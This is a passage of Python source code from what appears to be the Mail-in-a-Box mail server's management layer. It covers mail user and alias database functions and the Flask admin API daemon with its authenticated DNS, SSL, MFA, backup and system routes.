Sort aliases within each domain first by required-ness then lexicographically by address. for domain in domains: domain["aliases"].sort(key = lambda alias : (alias["auto"], alias["address"])) return domains def get_domain(emailaddr, as_unicode=True): # Gets the domain part of an email address. Turns IDNA # back to Unicode for display. ret = emailaddr.split('@', 1)[1] if as_unicode: try: ret = idna.decode(ret.encode('ascii')) except (ValueError, UnicodeError, idna.IDNAError): # Looks like we have an invalid email address in # the database. Now is not the time to complain. pass return ret def get_mail_domains(env, filter_aliases=lambda alias : True, users_only=False): # Returns the domain names (IDNA-encoded) of all of the email addresses # configured on the system. If users_only is True, only return domains # with email addresses that correspond to user accounts. Exclude Unicode # forms of domain names listed in the automatic aliases table. domains = [] domains.extend([get_domain(login, as_unicode=False) for login in get_mail_users(env)]) if not users_only: domains.extend([get_domain(address, as_unicode=False) for address, _, _, auto in get_mail_aliases(env) if filter_aliases(address) and not auto ]) return set(domains) def add_mail_user(email, pw, privs, env): # validate email if email.strip() == "": return ("No email address provided.", 400) elif not validate_email(email): return ("Invalid email address.", 400) elif not validate_email(email, mode='user'): return ("User account email addresses may only use the lowercase ASCII letters a-z, the digits 0-9, underscore (_), hyphen (-), and period (.).", 400) elif is_dcv_address(email) and len(get_mail_users(env)) > 0: # Make domain control validation hijacking a little harder to mess up by preventing the usual # addresses used for DCV from being user accounts. Except let it be the first account because # during box setup the user won't know the rules. return ("You may not make a user account for that address because it is frequently used for domain control validation. Use an alias instead if necessary.", 400) # validate password validate_password(pw) # validate privileges if privs is None or privs.strip() == "": privs = [] else: privs = privs.split("\n") for p in privs: validation = validate_privilege(p) if validation: return validation # get the database conn, c = open_database(env, with_connection=True) # hash the password pw = hash_password(pw) # add the user to the database try: c.execute("INSERT INTO users (email, password, privileges) VALUES (?, ?, ?)", (email, pw, "\n".join(privs))) except sqlite3.IntegrityError: return ("User already exists.", 400) # write databasebefore next step conn.commit() # Update things in case any new domains are added. return kick(env, "mail user added") def set_mail_password(email, pw, env): # validate that password is acceptable validate_password(pw) # hash the password pw = hash_password(pw) # update the database conn, c = open_database(env, with_connection=True) c.execute("UPDATE users SET password=? WHERE email=?", (pw, email)) if c.rowcount != 1: return ("That's not a user (%s)." % email, 400) conn.commit() return "OK" def hash_password(pw): # Turn the plain password into a Dovecot-format hashed password, meaning # something like "{SCHEME}hashedpassworddata". # http://wiki2.dovecot.org/Authentication/PasswordSchemes return utils.shell('check_output', ["/usr/bin/doveadm", "pw", "-s", "SHA512-CRYPT", "-p", pw]).strip() def get_mail_password(email, env): # Gets the hashed password for a user. Passwords are stored in Dovecot's # password format, with a prefixed scheme. # http://wiki2.dovecot.org/Authentication/PasswordSchemes # update the database c = open_database(env) c.execute('SELECT password FROM users WHERE email=?', (email,)) rows = c.fetchall() if len(rows) != 1: raise ValueError("That's not a user (%s)." % email) return rows[0][0] def remove_mail_user(email, env): # remove conn, c = open_database(env, with_connection=True) c.execute("DELETE FROM users WHERE email=?", (email,)) if c.rowcount != 1: return ("That's not a user (%s)." % email, 400) conn.commit() # Update things in case any domains are removed. return kick(env, "mail user removed") def parse_privs(value): return [p for p in value.split("\n") if p.strip() != ""] def get_mail_user_privileges(email, env, empty_on_error=False): # get privs c = open_database(env) c.execute('SELECT privileges FROM users WHERE email=?', (email,)) rows = c.fetchall() if len(rows) != 1: if empty_on_error: return [] return ("That's not a user (%s)." % email, 400) return parse_privs(rows[0][0]) def validate_privilege(priv): if "\n" in priv or priv.strip() == "": return ("That's not a valid privilege (%s)." % priv, 400) return None def add_remove_mail_user_privilege(email, priv, action, env): # validate validation = validate_privilege(priv) if validation: return validation # get existing privs, but may fail privs = get_mail_user_privileges(email, env) if isinstance(privs, tuple): return privs # error # update privs set if action == "add": if priv not in privs: privs.append(priv) elif action == "remove": privs = [p for p in privs if p != priv] else: return ("Invalid action.", 400) # commit to database conn, c = open_database(env, with_connection=True) c.execute("UPDATE users SET privileges=? WHERE email=?", ("\n".join(privs), email)) if c.rowcount != 1: return ("Something went wrong.", 400) conn.commit() return "OK" def add_mail_alias(address, forwards_to, permitted_senders, env, update_if_exists=False, do_kick=True): # convert Unicode domain to IDNA address = sanitize_idn_email_address(address) # Our database is case sensitive (oops), which affects mail delivery # (Postfix always queries in lowercase?), so force lowercase. address = address.lower() # validate address address = address.strip() if address == "": return ("No email address provided.", 400) if not validate_email(address, mode='alias'): return ("Invalid email address (%s)." % address, 400) # validate forwards_to validated_forwards_to = [] forwards_to = forwards_to.strip() # extra checks for email addresses used in domain control validation is_dcv_source = is_dcv_address(address) # Postfix allows a single @domain.tld as the destination, which means # the local part on the address is preserved in the rewrite. We must # try to convert Unicode to IDNA first before validating that it's a # legitimate alias address. Don't allow this sort of rewriting for # DCV source addresses. r1 = sanitize_idn_email_address(forwards_to) if validate_email(r1, mode='alias') and not is_dcv_source: validated_forwards_to.append(r1) else: # Parse comma and \n-separated destination emails & validate. In this # case, the forwards_to must be complete email addresses. for line in forwards_to.split("\n"): for email in line.split(","): email = email.strip() if email == "": continue email = sanitize_idn_email_address(email) # Unicode => IDNA # Strip any +tag from email alias and check privileges privileged_email = re.sub(r"(?=\+)[^@]*(?=@)",'',email) if not validate_email(email): return ("Invalid receiver email address (%s)." % email, 400) if is_dcv_source and not is_dcv_address(email) and "admin" not in get_mail_user_privileges(privileged_email, env, empty_on_error=True): # Make domain control validation hijacking a little harder to mess up by # requiring aliases for email addresses typically used in DCV to forward # only to accounts that are administrators on this system. return ("This alias can only have administrators of this system as destinations because the address is frequently used for domain control validation.", 400) validated_forwards_to.append(email) # validate permitted_senders valid_logins = get_mail_users(env) validated_permitted_senders = [] permitted_senders = permitted_senders.strip() # Parse comma and \n-separated sender logins & validate. The permitted_senders must be # valid usernames. for line in permitted_senders.split("\n"): for login in line.split(","): login = login.strip() if login == "": continue if login not in valid_logins: return ("Invalid permitted sender: %s is not a user on this system." % login, 400) validated_permitted_senders.append(login) # Make sure the alias has either a forwards_to or a permitted_sender. if len(validated_forwards_to) + len(validated_permitted_senders) == 0: return ("The alias must either forward to an address or have a permitted sender.", 400) # save to db forwards_to = ",".join(validated_forwards_to) permitted_senders = None if len(validated_permitted_senders) == 0 else ",".join(validated_permitted_senders) conn, c = open_database(env, with_connection=True) try: c.execute("INSERT INTO aliases (source, destination, permitted_senders) VALUES (?, ?, ?)", (address, forwards_to, permitted_senders)) return_status = "alias added" except sqlite3.IntegrityError: if not update_if_exists: return ("Alias already exists (%s)." % address, 400) else: c.execute("UPDATE aliases SET destination = ?, permitted_senders = ? WHERE source = ?", (forwards_to, permitted_senders, address)) return_status = "alias updated" conn.commit() if do_kick: # Update things in case any new domains are added. return kick(env, return_status) return None def remove_mail_alias(address, env, do_kick=True): # convert Unicode domain to IDNA address = sanitize_idn_email_address(address) # remove conn, c = open_database(env, with_connection=True) c.execute("DELETE FROM aliases WHERE source=?", (address,)) if c.rowcount != 1: return ("That's not an alias (%s)." % address, 400) conn.commit() if do_kick: # Update things in case any domains are removed. return kick(env, "alias removed") return None def add_auto_aliases(aliases, env): conn, c = open_database(env, with_connection=True) c.execute("DELETE FROM auto_aliases") for source, destination in aliases.items(): c.execute("INSERT INTO auto_aliases (source, destination) VALUES (?, ?)", (source, destination)) conn.commit() def get_system_administrator(env): return "administrator@" + env['PRIMARY_HOSTNAME'] def get_required_aliases(env): # These are the aliases that must exist. aliases = set() # The system administrator alias is required. aliases.add(get_system_administrator(env)) # The hostmaster alias is exposed in the DNS SOA for each zone. aliases.add("hostmaster@" + env['PRIMARY_HOSTNAME']) # Get a list of domains we serve mail for, except ones for which the only # email on that domain are the required aliases or a catch-all/domain-forwarder. real_mail_domains = get_mail_domains(env, filter_aliases = lambda alias : not alias.startswith("postmaster@") and not alias.startswith("admin@") and not alias.startswith("abuse@") and not alias.startswith("@") ) # Create postmaster@, admin@ and abuse@ for all domains we serve # mail on. postmaster@ is assumed to exist by our Postfix configuration. # admin@isn't anything, but it might save the user some trouble e.g. when # buying an SSL certificate. # abuse@ is part of RFC2142: https://www.ietf.org/rfc/rfc2142.txt for domain in real_mail_domains: aliases.add("postmaster@" + domain) aliases.add("admin@" + domain) aliases.add("abuse@" + domain) return aliases def kick(env, mail_result=None): results = [] # Include the current operation's result in output. if mail_result is not None: results.append(mail_result + "\n") auto_aliases = { } # Map required aliases to the administrator alias (which should be created manually). administrator = get_system_administrator(env) required_aliases = get_required_aliases(env) for alias in required_aliases: if alias == administrator: continue # don't make an alias from the administrator to itself --- this alias must be created manually auto_aliases[alias] = administrator # Add domain maps from Unicode forms of IDNA domains to the ASCII forms stored in the alias table. for domain in get_mail_domains(env): try: domain_unicode = idna.decode(domain.encode("ascii")) if domain == domain_unicode: continue # not an IDNA/Unicode domain auto_aliases["@" + domain_unicode] = "@" + domain except (ValueError, UnicodeError, idna.IDNAError): continue add_auto_aliases(auto_aliases, env) # Remove auto-generated postmaster/admin/abuse alises from the main aliases table. # They are now stored in the auto_aliases table. for address, forwards_to, _permitted_senders, auto in get_mail_aliases(env): user, domain = address.split("@") if user in {"postmaster", "admin", "abuse"} \ and address not in required_aliases \ and forwards_to == get_system_administrator(env) \ and not auto: remove_mail_alias(address, env, do_kick=False) results.append(f"removed alias {address} (was to {forwards_to}; domain no longer used for email)\n") # Update DNS and nginx in case any domains are added/removed. from dns_update import do_dns_update results.append( do_dns_update(env) ) from web_update import do_web_update results.append( do_web_update(env) ) return "".join(s for s in results if s != "") def validate_password(pw): # validate password if pw.strip() == "": msg = "No password provided." raise ValueError(msg) if len(pw) < 8: msg = "Passwords must be at least eight characters." raise ValueError(msg) if __name__ == "__main__": import sys if len(sys.argv) > 2 and sys.argv[1] == "validate-email": # Validate that we can create a Dovecot account for a given string. if validate_email(sys.argv[2], mode='user'): sys.exit(0) else: sys.exit(1) if len(sys.argv) > 1 and sys.argv[1] == "update": from utils import load_environment print(kick(load_environment())) File: management/daemon.py #!/usr/local/lib/mailinabox/env/bin/python3 # # The API can be accessed on the command line, e.g. use `curl` like so: # curl --user $(</var/lib/mailinabox/api.key): http://localhost:10222/mail/users # # During development, you can start the Mail-in-a-Box control panel # by running this script, e.g.: # # service mailinabox stop # stop the system process # DEBUG=1 management/daemon.py # service mailinabox start # when done debugging, start it up again import os, os.path, re, json, time import multiprocessing.pool from functools import wraps from flask import Flask, request, render_template, Response, send_from_directory, make_response import auth, utils from mailconfig import get_mail_users, get_mail_users_ex, get_admins, add_mail_user, set_mail_password, remove_mail_user from mailconfig import get_mail_user_privileges, add_remove_mail_user_privilege from mailconfig import get_mail_aliases, get_mail_aliases_ex, get_mail_domains, add_mail_alias, remove_mail_alias from mfa import get_public_mfa_state, provision_totp, validate_totp_secret, enable_mfa, disable_mfa import contextlib env = utils.load_environment() auth_service = auth.AuthService() # We may deploy via a symbolic link, which confuses flask's template finding. me = __file__ with contextlib.suppress(OSError): me = os.readlink(__file__) # for generating CSRs we need a list of country codes csr_country_codes = [] with open(os.path.join(os.path.dirname(me), "csr_country_codes.tsv"), encoding="utf-8") as f: for line in f: if line.strip() == "" or line.startswith("#"): continue code, name = line.strip().split("\t")[0:2] csr_country_codes.append((code, name)) app = Flask(__name__, template_folder=os.path.abspath(os.path.join(os.path.dirname(me), "templates"))) # Decorator to protect views that require a user with 'admin' privileges. def authorized_personnel_only(viewfunc): @wraps(viewfunc) def newview(*args, **kwargs): # Authenticate the passed credentials, which is either the API key or a username:password pair # and an optional X-Auth-Token token. error = None privs = [] try: email, privs = auth_service.authenticate(request, env) except ValueError as e: # Write a line in the log recording the failed login, unless no authorization header # was given which can happen on an initial request before a 403 response. if "Authorization" in request.headers: log_failed_login(request) # Authentication failed. error = str(e) # Authorized to access an API view? if "admin" in privs: # Store the email address of the logged in user so it can be accessed # from the API methods that affect the calling user. request.user_email = email request.user_privs = privs # Call view func. return viewfunc(*args, **kwargs) if not error: error = "You are not an administrator." # Not authorized. Return a 401 (send auth) and a prompt to authorize by default. status = 401 headers = { 'WWW-Authenticate': f'Basic realm="{auth_service.auth_realm}"', 'X-Reason': error, } if request.headers.get('X-Requested-With') == 'XMLHttpRequest': # Don't issue a 401 to an AJAX request because the user will # be prompted for credentials, which is not helpful. status = 403 headers = None if request.headers.get('Accept') in {None, "", "*/*"}: # Return plain text output. return Response(error+"\n", status=status, mimetype='text/plain', headers=headers) else: # Return JSON output. return Response(json.dumps({ "status": "error", "reason": error, })+"\n", status=status, mimetype='application/json', headers=headers) return newview @app.errorhandler(401) def unauthorized(error): return auth_service.make_unauthorized_response() def json_response(data, status=200): return Response(json.dumps(data, indent=2, sort_keys=True)+'\n', status=status, mimetype='application/json') ################################### # Control Panel (unauthenticated views) @app.route('/') def index(): # Render the control panel. This route does not require user authentication # so it must be safe! no_users_exist = (len(get_mail_users(env)) == 0) no_admins_exist = (len(get_admins(env)) == 0) import boto3.s3 backup_s3_hosts = [(r, f"s3.{r}.amazonaws.com") for r in boto3.session.Session().get_available_regions('s3')] return render_template('index.html', hostname=env['PRIMARY_HOSTNAME'], storage_root=env['STORAGE_ROOT'], no_users_exist=no_users_exist, no_admins_exist=no_admins_exist, backup_s3_hosts=backup_s3_hosts, csr_country_codes=csr_country_codes, ) # Create a session key by checking the username/password in the Authorization header. @app.route('/login', methods=["POST"]) def login(): # Is the caller authorized? try: email, privs = auth_service.authenticate(request, env, login_only=True) except ValueError as e: if "missing-totp-token" in str(e): return json_response({ "status": "missing-totp-token", "reason": str(e), }) else: # Log the failed login log_failed_login(request) return json_response({ "status": "invalid", "reason": str(e), }) # Return a new session for the user. resp = { "status": "ok", "email": email, "privileges": privs, "api_key": auth_service.create_session_key(email, env, type='login'), } app.logger.info(f"New login session created for {email}") # Return. return json_response(resp) @app.route('/logout', methods=["POST"]) def logout(): try: email, _ = auth_service.authenticate(request, env, logout=True) app.logger.info(f"{email} logged out") except ValueError: pass finally: return json_response({ "status": "ok" }) # MAIL @app.route('/mail/users') @authorized_personnel_only def mail_users(): if request.args.get("format", "") == "json": return json_response(get_mail_users_ex(env, with_archived=True)) else: return "".join(x+"\n" for x in get_mail_users(env)) @app.route('/mail/users/add', methods=['POST']) @authorized_personnel_only def mail_users_add(): try: return add_mail_user(request.form.get('email', ''), request.form.get('password', ''), request.form.get('privileges', ''), env) except ValueError as e: return (str(e), 400) @app.route('/mail/users/password', methods=['POST']) @authorized_personnel_only def mail_users_password(): try: return set_mail_password(request.form.get('email', ''), request.form.get('password', ''), env) except ValueError as e: return (str(e), 400) @app.route('/mail/users/remove', methods=['POST']) @authorized_personnel_only def mail_users_remove(): return remove_mail_user(request.form.get('email', ''), env) @app.route('/mail/users/privileges') @authorized_personnel_only def mail_user_privs(): privs = get_mail_user_privileges(request.args.get('email', ''), env) if isinstance(privs, tuple): return privs # error return "\n".join(privs) @app.route('/mail/users/privileges/add', methods=['POST']) @authorized_personnel_only def mail_user_privs_add(): return add_remove_mail_user_privilege(request.form.get('email', ''), request.form.get('privilege', ''), "add", env) @app.route('/mail/users/privileges/remove', methods=['POST']) @authorized_personnel_only def mail_user_privs_remove(): return add_remove_mail_user_privilege(request.form.get('email', ''), request.form.get('privilege', ''), "remove", env) @app.route('/mail/aliases') @authorized_personnel_only def mail_aliases(): if request.args.get("format", "") == "json": return json_response(get_mail_aliases_ex(env)) else: return "".join(address+"\t"+receivers+"\t"+(senders or "")+"\n" for address, receivers, senders, auto in get_mail_aliases(env)) @app.route('/mail/aliases/add', methods=['POST']) @authorized_personnel_only def mail_aliases_add(): return add_mail_alias( request.form.get('address', ''), request.form.get('forwards_to', ''), request.form.get('permitted_senders', ''), env, update_if_exists=(request.form.get('update_if_exists', '') == '1') ) @app.route('/mail/aliases/remove', methods=['POST']) @authorized_personnel_only def mail_aliases_remove(): return remove_mail_alias(request.form.get('address', ''), env) @app.route('/mail/domains') @authorized_personnel_only def mail_domains(): return "".join(x+"\n" for x in get_mail_domains(env)) # DNS @app.route('/dns/zones') @authorized_personnel_only def dns_zones(): from dns_update import get_dns_zones return json_response([z[0] for z in get_dns_zones(env)]) @app.route('/dns/update', methods=['POST']) @authorized_personnel_only def dns_update(): from dns_update import do_dns_update try: return do_dns_update(env, force=request.form.get('force', '') == '1') except Exception as e: return (str(e), 500) @app.route('/dns/secondary-nameserver') @authorized_personnel_only def dns_get_secondary_nameserver(): from dns_update import get_custom_dns_config, get_secondary_dns return json_response({ "hostnames": get_secondary_dns(get_custom_dns_config(env), mode=None) }) @app.route('/dns/secondary-nameserver', methods=['POST']) @authorized_personnel_only def dns_set_secondary_nameserver(): from dns_update import set_secondary_dns try: return set_secondary_dns([ns.strip() for ns in re.split(r"[, ]+", request.form.get('hostnames') or "") if ns.strip() != ""], env) except ValueError as e: return (str(e), 400) @app.route('/dns/custom') @authorized_personnel_only def dns_get_records(qname=None, rtype=None): # Get the current set of custom DNS records. from dns_update import get_custom_dns_config, get_dns_zones records = get_custom_dns_config(env, only_real_records=True) # Filter per the arguments for the more complex GET routes below. records = [r for r in records if (not qname or r[0] == qname) and (not rtype or r[1] == rtype) ] # Make a better data structure. records = [ { "qname": r[0], "rtype": r[1], "value": r[2], "sort-order": { }, } for r in records ] # To help with grouping by zone in qname sorting, label each record with which zone it is in. # There's an inconsistency in how we handle zones in get_dns_zones and in sort_domains, so # do this first before sorting the domains within the zones. zones = utils.sort_domains([z[0] for z in get_dns_zones(env)], env) for r in records: for z in zones: if r["qname"] == z or r["qname"].endswith("." + z): r["zone"] = z break # Add sorting information. The 'created' order follows the order in the YAML file on disk, # which tracs the order entries were added in the control panel since we append to the end. # The 'qname' sort order sorts by our standard domain name sort (by zone then by qname), # then by rtype, and last by the original order in the YAML file (since sorting by value # may not make sense, unless we parse IP addresses, for example). for i, r in enumerate(records): r["sort-order"]["created"] = i domain_sort_order = utils.sort_domains([r["qname"] for r in records], env) for i, r in enumerate(sorted(records, key = lambda r : ( zones.index(r["zone"]) if r.get("zone") else 0, # record is not within a zone managed by the box domain_sort_order.index(r["qname"]), r["rtype"]))): r["sort-order"]["qname"] = i # Return. return json_response(records) @app.route('/dns/custom/<qname>', methods=['GET', 'POST', 'PUT', 'DELETE']) @app.route('/dns/custom/<qname>/<rtype>', methods=['GET', 'POST', 'PUT', 'DELETE']) @authorized_personnel_only def dns_set_record(qname, rtype="A"): from dns_update import do_dns_update, set_custom_dns_record try: # Normalize. rtype = rtype.upper() # Read the record value from the request BODY, which must be # ASCII-only. Not used with GET. value = request.stream.read().decode("ascii", "ignore").strip() if request.method == "GET": # Get the existing records matching the qname and rtype. return dns_get_records(qname, rtype) elif request.method in {"POST", "PUT"}: # There is a default value for A/AAAA records. if rtype in {"A", "AAAA"} and value == "": value = request.environ.get("HTTP_X_FORWARDED_FOR") # normally REMOTE_ADDR but we're behind nginx as a reverse proxy # Cannot add empty records. if value == '': return ("No value for the record provided.", 400) if request.method == "POST": # Add a new record (in addition to any existing records # for this qname-rtype pair). action = "add" elif request.method == "PUT": # In REST, PUT is supposed to be idempotent, so we'll # make this action set (replace all records for this # qname-rtype pair) rather than add (add a new record). action = "set" elif request.method == "DELETE": if value == '': # Delete all records for this qname-type pair. value = None else: # Delete just the qname-rtype-value record exactly. pass action = "remove" if set_custom_dns_record(qname, rtype, value, action, env): return do_dns_update(env) or "Something isn't right." return "OK" except ValueError as e: return (str(e), 400) @app.route('/dns/dump') @authorized_personnel_only def dns_get_dump(): from dns_update import build_recommended_dns return json_response(build_recommended_dns(env)) @app.route('/dns/zonefile/<zone>') @authorized_personnel_only def dns_get_zonefile(zone): from dns_update import get_dns_zonefile return Response(get_dns_zonefile(zone, env), status=200, mimetype='text/plain') # SSL @app.route('/ssl/status') @authorized_personnel_only def ssl_get_status(): from ssl_certificates import get_certificates_to_provision from web_update import get_web_domains_info, get_web_domains # What domains can we provision certificates for? What unexpected problems do we have? provision, cant_provision = get_certificates_to_provision(env, show_valid_certs=False) # What's the current status of TLS certificates on all of the domain? domains_status = get_web_domains_info(env) domains_status = [ { "domain": d["domain"], "status": d["ssl_certificate"][0], "text": d["ssl_certificate"][1] + (" " + cant_provision[d["domain"]] if d["domain"] in cant_provision else "") } for d in domains_status ] # Warn the user about domain names not hosted here because of other settings. for domain in set(get_web_domains(env, exclude_dns_elsewhere=False)) - set(get_web_domains(env)): domains_status.append({ "domain": domain, "status": "not-applicable", "text": "The domain's website is hosted elsewhere.", }) return json_response({ "can_provision": utils.sort_domains(provision, env), "status": domains_status, }) @app.route('/ssl/csr/<domain>', methods=['POST']) @authorized_personnel_only def ssl_get_csr(domain): from ssl_certificates import create_csr ssl_private_key = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_private_key.pem')) return create_csr(domain, ssl_private_key, request.form.get('countrycode', ''), env) @app.route('/ssl/install', methods=['POST']) @authorized_personnel_only def ssl_install_cert(): from web_update import get_web_domains from ssl_certificates import install_cert domain = request.form.get('domain') ssl_cert = request.form.get('cert') ssl_chain = request.form.get('chain') if domain not in get_web_domains(env): return "Invalid domain name." return install_cert(domain, ssl_cert, ssl_chain, env) @app.route('/ssl/provision', methods=['POST']) @authorized_personnel_only def ssl_provision_certs(): from ssl_certificates import provision_certificates requests = provision_certificates(env, limit_domains=None) return json_response({ "requests": requests }) # multi-factor auth @app.route('/mfa/status', methods=['POST']) @authorized_personnel_only def mfa_get_status(): # Anyone accessing this route is an admin, and we permit them to # see the MFA status for any user if they submit a 'user' form # field. But we don't include provisioning info since a user can # only provision for themselves. email = request.form.get('user', request.user_email) # user field if given, otherwise the user making the request try: resp = { "enabled_mfa": get_public_mfa_state(email, env) } if email == request.user_email: resp.update({ "new_mfa": { "totp": provision_totp(email, env) } }) except ValueError as e: return (str(e), 400) return json_response(resp) @app.route('/mfa/totp/enable', methods=['POST']) @authorized_personnel_only def totp_post_enable(): secret = request.form.get('secret') token = request.form.get('token') label = request.form.get('label') if not isinstance(token, str): return ("Bad Input", 400) try: validate_totp_secret(secret) enable_mfa(request.user_email, "totp", secret, token, label, env) except ValueError as e: return (str(e), 400) return "OK" @app.route('/mfa/disable', methods=['POST']) @authorized_personnel_only def totp_post_disable(): # Anyone accessing this route is an admin, and we permit them to # disable the MFA status for any user if they submit a 'user' form # field. email = request.form.get('user', request.user_email) # user field if given, otherwise the user making the request try: result = disable_mfa(email, request.form.get('mfa-id') or None, env) # convert empty string to None except ValueError as e: return (str(e), 400) if result: # success return "OK" else: # error return ("Invalid user or MFA id.", 400) # WEB @app.route('/web/domains') @authorized_personnel_only def web_get_domains(): from web_update import get_web_domains_info return json_response(get_web_domains_info(env)) @app.route('/web/update', methods=['POST']) @authorized_personnel_only def web_update(): from web_update import do_web_update return do_web_update(env) # System @app.route('/system/version', methods=["GET"]) @authorized_personnel_only def system_version(): from status_checks import what_version_is_this try: return what_version_is_this(env) except Exception as e: return (str(e), 500) @app.route('/system/latest-upstream-version', methods=["POST"]) @authorized_personnel_only def system_latest_upstream_version(): from status_checks import get_latest_miab_version try: return get_latest_miab_version() except Exception as e: return (str(e), 500) @app.route('/system/status', methods=["POST"]) @authorized_personnel_only def system_status(): from status_checks import run_checks class WebOutput: def __init__(self): self.items = [] def add_heading(self, heading): self.items.append({ "type": "heading", "text": heading, "extra": [] }) def print_ok(self, message): self.items.append({ "type": "ok", "text": message, "extra": [] }) def print_error(self, message): self.items.append({ "type": "error", "text": message, "extra": [] }) def print_warning(self, message): self.items.append({ "type": "warning", "text": message, "extra": [] }) def print_line(self, message, monospace=False): self.items[-1]["extra"].append({ "text": message, "monospace": monospace }) output = WebOutput() # Create a temporary pool of processes for the status checks with multiprocessing.pool.Pool(processes=5) as pool: run_checks(False, env, output, pool) pool.close() pool.join() return json_response(output.items) @app.route('/system/updates') @authorized_personnel_only def show_updates(): from status_checks import list_apt_updates return "".join( "{} ({})\n".format(p["package"], p["version"]) for p in list_apt_updates()) @app.route('/system/update-packages', methods=["POST"]) @authorized_personnel_only def do_updates(): utils.shell("check_call", ["/usr/bin/apt-get", "-qq", "update"]) return utils.shell("check_output", ["/usr/bin/apt-get", "-y", "upgrade"], env={ "DEBIAN_FRONTEND": "noninteractive" }) @app.route('/system/reboot', methods=["GET"]) @authorized_personnel_only def needs_reboot(): from status_checks import is_reboot_needed_due_to_package_installation if is_reboot_needed_due_to_package_installation(): return json_response(True) else: return json_response(False) @app.route('/system/reboot', methods=["POST"]) @authorized_personnel_only def do_reboot(): # To keep the attack surface low, we don't allow a remote reboot if one isn't necessary. from status_checks import is_reboot_needed_due_to_package_installation if is_reboot_needed_due_to_package_installation(): return utils.shell("check_output", ["/sbin/shutdown", "-r", "now"], capture_stderr=True) else: return "No reboot is required, so it is not allowed." @app.route('/system/backup/status') @authorized_personnel_only def backup_status(): from backup import backup_status try: return json_response(backup_status(env)) except Exception as e: return json_response({ "error": str(e) }) @app.route('/system/backup/config', methods=["GET"]) @authorized_personnel_only def backup_get_custom(): from backup import get_backup_config return json_response(get_backup_config(env, for_ui=True)) @app.route('/system/backup/config', methods=["POST"]) @authorized_personnel_only def backup_set_custom(): from backup import backup_set_custom return json_response(backup_set_custom(env, request.form.get('target', ''), request.form.get('target_user', ''), request.form.get('target_pass', ''), request.form.get('min_age', '') )) @app.route('/system/privacy', methods=["GET"]) @authorized_personnel_only def privacy_status_get(): config = utils.load_settings(env) return json_response(config.get("privacy", True)) @app.route('/system/privacy', methods=["POST"]) @authorized_personnel_only def privacy_status_set(): config = utils.load_settings(env) config["privacy"] = (request.form.get('value') == "private") utils.write_settings(config, env) return "OK" # MUNIN @app.route('/munin/') @authorized_personnel_only def munin_start(): # Munin pages, static images, and dynamically generated images are served # outside of the AJAX API. We'll start with a 'start' API that sets a cookie # that subsequent requests will read for authorization. (We don't use cookies # for the API to avoid CSRF vulnerabilities.) response = make_response("OK") response.set_cookie("session", auth_service.create_session_key(request.user_email, env, type='cookie'), max_age=60*30, secure=True, httponly=True, samesite="Strict") # 30 minute duration return response def check_request_cookie_for_admin_access(): session = auth_service.get_session(None, request.cookies.get("session", ""), "cookie", env) if not session: return False privs = get_mail_user_privileges(session["email"], env) if not isinstance(privs, list): return False if "admin" not in privs: return False return True def authorized_personnel_only_via_cookie(f): @wraps(f) def g(*args, **kwargs): if not check_request_cookie_for_admin_access(): return Response("Unauthorized", status=403, mimetype='text/plain', headers={}) return f(*args, **kwargs) return g @app.route('/munin/<path:filename>') @authorized_personnel_only_via_cookie def munin_static_file(filename=""): # Proxy the request to static files. if filename == "": filename = "index.html" return send_from_directory("/var/cache/munin/www", filename) @app.route('/munin/cgi-graph/<path:filename>') @authorized_personnel_only_via_cookie def munin_cgi(filename): """ Relay munin cgi dynazoom requests /usr/lib/munin/cgi/munin-cgi-graph is a perl cgi script in the munin package that is responsible for generating binary png images _and_ associated HTTP headers based on parameters in the requesting URL. All output is written to stdout which munin_cgi splits into response headers and binary response data. munin-cgi-graph reads environment variables to determine what it should do. It expects a path to be in the env-var PATH_INFO, and a querystring to be in the env-var QUERY_STRING. munin-cgi-graph has several failure modes. Some write HTTP Status headers and others return nonzero exit codes. Situating munin_cgi between the user-agent and munin-cgi-graph enables keeping the cgi script behind mailinabox's auth mechanisms and avoids additional support infrastructure like spawn-fcgi. """ COMMAND = 'su munin --preserve-environment --shell=/bin/bash -c /usr/lib/munin/cgi/munin-cgi-graph' # su changes user, we use the munin user here # --preserve-environment retains the environment, which is where Popen's `env` data is # --shell=/bin/bash ensures the shell used is bash # -c "/usr/lib/munin/cgi/munin-cgi-graph" passes the command to run as munin # "%s" is a placeholder for where the request's querystring will be added if filename == "": return ("a path must be specified", 404) query_str = request.query_string.decode("utf-8", 'ignore') env = {'PATH_INFO': '/%s/' % filename, 'REQUEST_METHOD': 'GET', 'QUERY_STRING': query_str} code, binout = utils.shell('check_output', COMMAND.split(" ", 5), # Using a maxsplit of 5 keeps the last arguments together env=env, return_bytes=True, trap=True) if code != 0: # nonzero returncode indicates error app.logger.error("munin_cgi: munin-cgi-graph returned nonzero exit code, %s", code) return ("error processing graph image", 500) # /usr/lib/munin/cgi/munin-cgi-graph returns both headers and binary png when successful. # A double-Windows-style-newline always indicates the end of HTTP headers. headers, image_bytes = binout.split(b'\r\n\r\n', 1) response = make_response(image_bytes) for line in headers.splitlines(): name, value = line.decode("utf8").split(':', 1) response.headers[name] = value if 'Status' in response.headers and '404' in response.headers['Status']: app.logger.warning("munin_cgi: munin-cgi-graph returned 404 status code. PATH_INFO=%s", env['PATH_INFO']) return response def log_failed_login(request): # We need to figure out the ip to list in the message, all our calls are routed # through nginx who will put the original ip in X-Forwarded-For. # During setup we call the management interface directly to determine the user # status. So we can't always use X-Forwarded-For because during setup that header # will not be present. ip = request.headers.getlist("X-Forwarded-For")[0] if request.headers.getlist("X-Forwarded-For") else request.remote_addr # We need to add a timestamp to the log message, otherwise /dev/log will eat the "duplicate" # message. app.logger.warning( f"Mail-in-a-Box Management Daemon: Failed login attempt from ip {ip} - timestamp {time.time()}") # APP if __name__ == '__main__': if "DEBUG" in os.environ: # Turn on Flask debugging. app.debug = True if not app.debug: app.logger.addHandler(utils.create_syslog_handler()) #app.logger.info('API key: ' + auth_service.key) # Start the application server. Listens on 127.0.0.1 (IPv4 only). app.run(port=10222) File: management/wsgi.py from daemon import app import utils app.logger.addHandler(utils.create_syslog_handler()) if __name__ == "__main__": app.run(port=10222)
